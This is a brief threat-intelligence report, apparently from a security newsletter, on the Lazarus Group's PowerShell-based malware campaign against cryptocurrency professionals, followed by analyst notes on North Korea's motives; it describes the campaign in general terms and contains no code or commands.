North Korea (Lazarus Group): The North Korean hacking group known as the Lazarus Group has been targeting crypto-currency professionals and services. Last November, it was reported that the group was using new types of malware to target systems to steal crypto-currency and information about the devices that are being used in crypto currency endeavors. This operation was the first one that was seen that utilized a Mac malware and had the ability to compromise Mac machines. This newest operation is using a PowerShell script for Windows exploitation. The group is highly sophisticated and has multiple different forms of backup and redundancy to ensure the highest rate of infection–including having reserve malware in case that if the malware gets detected, they could still carry out the attack. In this particular case, the group is using a PowerShell command and C2 servers to communicate to the targeted device. The C2 script names are disguised as open source projects and WordPress names to avoid detection. The malware has the ability to download and upload files, and the majority of the files have been seen in Korean. The files being written in Korean would lead one to believe that the Lazarus Group is trying to target South Korean entities.
Analyst Notes
North Korean has a long-standing reputation of targeting South Korea and even though negotiations seem to be going well with North Korea, South Korea and the United States, does not mean that North Korea has stopped their cyber operations. North Korea will always need a way to supplement their income with the many sanctions put on them and targeting the Financial Industry will always be a way to accomplish that.
